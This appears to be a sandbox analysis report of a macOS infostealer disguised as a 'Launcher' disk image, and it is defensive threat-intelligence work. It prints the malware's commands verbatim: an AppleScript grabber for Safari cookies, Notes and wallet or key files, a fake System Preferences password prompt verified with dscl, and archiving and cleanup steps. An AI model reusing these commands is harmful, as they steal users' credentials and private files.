1b61497cc0b24f7a1caef2440986c9a82a2dd83acbe2e99ca6a3287581d742bb

Resubmissions

27/05/2024, 11:03

240527-m54tlahb6y 7

18/05/2024, 11:06

240518-m7tfmsgd9y 7

Analysis

max time kernel
163s
max time network
134s
platform
macos-10.15_amd64
resource
macos-20240410-en
resource tags

arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
27/05/2024, 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher (1).dmg
Size

1006KB
MD5

c92da1857605ceb898ee160fbaa34ef9
SHA1

ed8b41a86b5ec09c6c3a03a5a43a42a35c2d1ede
SHA256

1b61497cc0b24f7a1caef2440986c9a82a2dd83acbe2e99ca6a3287581d742bb
SHA512

dfa0b79a09022b86ccda8c9a594576e3d74b383d87da200aaa31bdad4fc65eea248bca6d6e42e78059e78862d10c73676fc2701f67243238141ac82ab74fa2dd
SSDEEP

24576:FRex1zkDCG082nYMhLCUa8G7dXiyOrhgbqvpekWO:FERG082nZ4Ua8GJyyOrhgr6

Score

7^/10

discovery evasion execution

Malware Config

Signatures

Queries the macOS version information. 1 TTPs 2 IoCs

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

discovery

System Information Discovery

T1082

ioc	Process
sh -c sw_vers	Process not Found
sw_vers	Process not Found

System Checks 1 TTPs 2 IoCs

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.

evasion

System Checks

T1497.001

ioc	Process
sh -c "system_profiler SPHardwareDataType"	Process not Found
system_profiler SPHardwareDataType	Process not Found

File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
evasion

File Deletion
T1070.004

AppleScript 1 TTPs 8 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e "set baseFolderPath to (path to home folder as text) & \"1233546738\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"	Process not Found
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"	Process not Found
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"	Process not Found
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"	Process not Found
osascript -e "tell application \"Terminal\" to set visible of front window to false"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"	Process not Found

Resource Forking 1 TTPs 3 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy	Process not Found
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/Launcher\""
1⤵
PID:598

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/Launcher\""
1⤵
PID:598

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/Launcher"
1⤵
PID:598
- /bin/zsh
  /bin/zsh -c "open /Volumes/Launcher"
  2⤵
  PID:599
- /usr/bin/open
  open /Volumes/Launcher
  2⤵
  PID:599

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:600

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:602

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:601

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.security.cloudkeychainproxy3
1⤵
PID:605

/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
1⤵
PID:605

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:613

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:613

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:614

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:614

/usr/libexec/xpcproxy
xpcproxy com.apple.secinitd
1⤵
PID:615

/usr/libexec/secinitd
/usr/libexec/secinitd
1⤵
PID:615

/usr/libexec/xpcproxy
xpcproxy com.apple.AddressBook.ContactsAccountsService
1⤵
PID:617

/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
1⤵
PID:617

/usr/libexec/xpcproxy
xpcproxy com.apple.suggestd
1⤵
PID:618

/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
1⤵
PID:618

/usr/libexec/xpcproxy
xpcproxy com.apple.knowledge-agent
1⤵
PID:619

/usr/libexec/knowledge-agent
/usr/libexec/knowledge-agent
1⤵
PID:619

/usr/libexec/xpcproxy
xpcproxy com.apple.routined
1⤵
PID:620

/usr/libexec/routined
/usr/libexec/routined LAUNCHED_BY_LAUNCHD
1⤵
PID:620

/usr/libexec/xpcproxy
xpcproxy com.apple.Maps.mapspushd
1⤵
PID:621

/System/Library/CoreServices/mapspushd
/System/Library/CoreServices/mapspushd
1⤵
PID:621

/usr/libexec/xpcproxy
xpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A
1⤵
PID:625

/usr/libexec/neagent
/usr/libexec/neagent
1⤵
PID:625

/usr/libexec/xpcproxy
xpcproxy com.apple.siri.context.service
1⤵
PID:627

/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
1⤵
PID:627

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:628

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:628

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:629

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:629

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputSwitcher
1⤵
PID:630

/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
1⤵
PID:630

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:632

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:632

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:633

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:633
- /usr/bin/login
  login -pf run
  2⤵
  PID:636
- - /bin/zsh
    -zsh
    3⤵
    PID:640
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:642
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:643
- /usr/bin/login
  login -pf run
  2⤵
  PID:641
- - /bin/zsh
    -zsh
    3⤵
    PID:644
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:645
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:646
  - - /Volumes/Launcher/Launcher
      /Volumes/Launcher/Launcher
      4⤵
      PID:647

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:634

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:637

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:637

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:638

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:638

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:639

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:639

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:648

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:648

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to set visible of front window to false"
1⤵
PID:648

/bin/sh
sh -c "mkdir /Users/run/1233546738"
1⤵
PID:649

/bin/bash
sh -c "mkdir /Users/run/1233546738"
1⤵
PID:649

/bin/mkdir
mkdir /Users/run/1233546738
1⤵
PID:649

/bin/sh
sh -c sw_vers
1⤵
PID:650

/bin/bash
sh -c sw_vers
1⤵
PID:650

/usr/bin/sw_vers
sw_vers
1⤵
PID:650

/bin/sh
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:651

/bin/bash
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:651

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:651

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:653

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:653

/bin/sh
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:654

/bin/bash
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:654

/usr/sbin/system_profiler
system_profiler SPDisplaysDataType
1⤵
PID:654

/bin/sh
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:656

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:656

/usr/bin/dscl
dscl /Local/Default -authonly run
1⤵
PID:656

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:657

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:657

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:657

/bin/sh
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:659

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:659

/usr/bin/dscl
dscl /Local/Default -authonly run root
1⤵
PID:659

/bin/sh
sh -c "mkdir -p '/Users/run/1233546738/Chromium/Chrome'"
1⤵
PID:662

/bin/bash
sh -c "mkdir -p '/Users/run/1233546738/Chromium/Chrome'"
1⤵
PID:662

/bin/mkdir
mkdir -p /Users/run/1233546738/Chromium/Chrome
1⤵
PID:662

/bin/sh
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:663

/bin/bash
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:663

/usr/bin/osascript
osascript -e "set baseFolderPath to (path to home folder as text) & \"1233546738\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
1⤵
PID:663

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportCrash
1⤵
PID:669

/System/Library/CoreServices/ReportCrash
/System/Library/CoreServices/ReportCrash agent
1⤵
PID:669

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:670

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:670

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.339E7796-74DC-486F-A8B9-036B03909736
1⤵
PID:672

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:672

/bin/sh
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr"
1⤵
PID:673

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr"
1⤵
PID:673

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr
1⤵
PID:673

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:677

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:677

/bin/sh
sh -c "rm -rf /Users/run/1233546738"
1⤵
PID:687

/bin/bash
sh -c "rm -rf /Users/run/1233546738"
1⤵
PID:687

/bin/rm
rm -rf /Users/run/1233546738
1⤵
PID:687

/bin/sh
sh -c "rm /Users/run/1233546738.zip"
1⤵
PID:688

/bin/bash
sh -c "rm /Users/run/1233546738.zip"
1⤵
PID:688

/bin/rm
rm /Users/run/1233546738.zip
1⤵
PID:688

/bin/sh
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:689

/bin/bash
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:689

/usr/bin/osascript
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
1⤵
PID:689

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Resource Forking

T1564.009

Indicator Removal

T1070

File Deletion

T1070.004

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/./1233546738/Chromium/Chrome/Autofill0

Filesize
90KB

MD5
4e9060f76c1cb5b54005dc6640a58f0d

SHA1
04a1e6791ae55612d9b63f23ccb37eec398b3d27

SHA256
5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3

SHA512
be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148

Download Submit
/Users/run/./1233546738/Chromium/Chrome/Cookies2

Filesize
20KB

MD5
2a3fa78b5f55b529a2698ad187c80204

SHA1
cbbda35512038de511ac23b0aed12e9e86bcc796

SHA256
d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b

SHA512
e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab

Download Submit
/Users/run/./1233546738/Chromium/Chrome/Password1

Filesize
40KB

MD5
b6914d8e5cb470236eceed8d6f8b4fb7

SHA1
cdff8880e9fa7630fc8d57af4669365b5ab29b60

SHA256
45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1

SHA512
1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7

Download Submit
/Users/run/./1233546738/Sysinfo.txt

Filesize
1KB

MD5
31717a21202f4dbab34a72c86ae4f3f2

SHA1
78fab4a3136000513a8f66f2d81d19cb2473338d

SHA256
6e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da

SHA512
4c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c

Download Submit
/Users/run/./1233546738/login-keychain

Filesize
104KB

MD5
a434d5e7e9a5b967e47c44a75bfd66e1

SHA1
3fce32466913a348170172100553cb5bd953ef90

SHA256
ed641fc991345ae3c0ebeac30c25490f83a9ba7b06aa073d0403f62be4b5f016

SHA512
e51663e418f66250c73badc2a9d43f8be5d6ff8e11425046ab6d1792459e6629c49b6ba6eb612eb30bdaec5f102e7260a3107408d3edce0d7dd7f8305ff326e5

Download Submit
/Users/run/./1233546738/password-entered

Filesize
4B

MD5
63a9f0ea7bb98050796b649e85481845

SHA1
dc76e9f0c0006e8f919e0c515c66dbba3982f785

SHA256
4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2

SHA512
99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8

Download Submit
/Users/run/Library/Caches/GeoServices/ActiveTileGroup.pbd

Filesize
124KB

MD5
2b462e40cd20c9cab2baf9c32eaf0706

SHA1
663a9c3970103ad14389e45554d39316746b59b1

SHA256
2eb4199a80d0182558ba25439e6c7e7042259ce83d746e6b62efa3ae8f318790

SHA512
3d634109433811666f84046ee636393064a5d3b0b443b8f41c7d9c30a37f97da6f929b7f8ce9e7110da9f155e40e58db622a33f6e477d9a48170d5e2378221f0

Download Submit
/var/db/locationd/Library/Caches/GeoServices/Resources/altitude-1285.xml

Filesize
179KB

MD5
9a43af57707d2fb460832049d1f217d1

SHA1
056d813f8cb5198ca82072f7e3484f38ea5267f8

SHA256
7224f8828694ed74a8353567e4d84da188d15a993a4a75938f8409cb49218e7c

SHA512
1f33175f5d0958c79540a627552f71c6960b6ff19c9b2b0aa604c00bfeff216f6ea2ec3a22ef91ad8d7249597fdf5ad49ddbf5f4aef71b397e785152474954d7

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsDirectory.db

Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsObject.db

Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads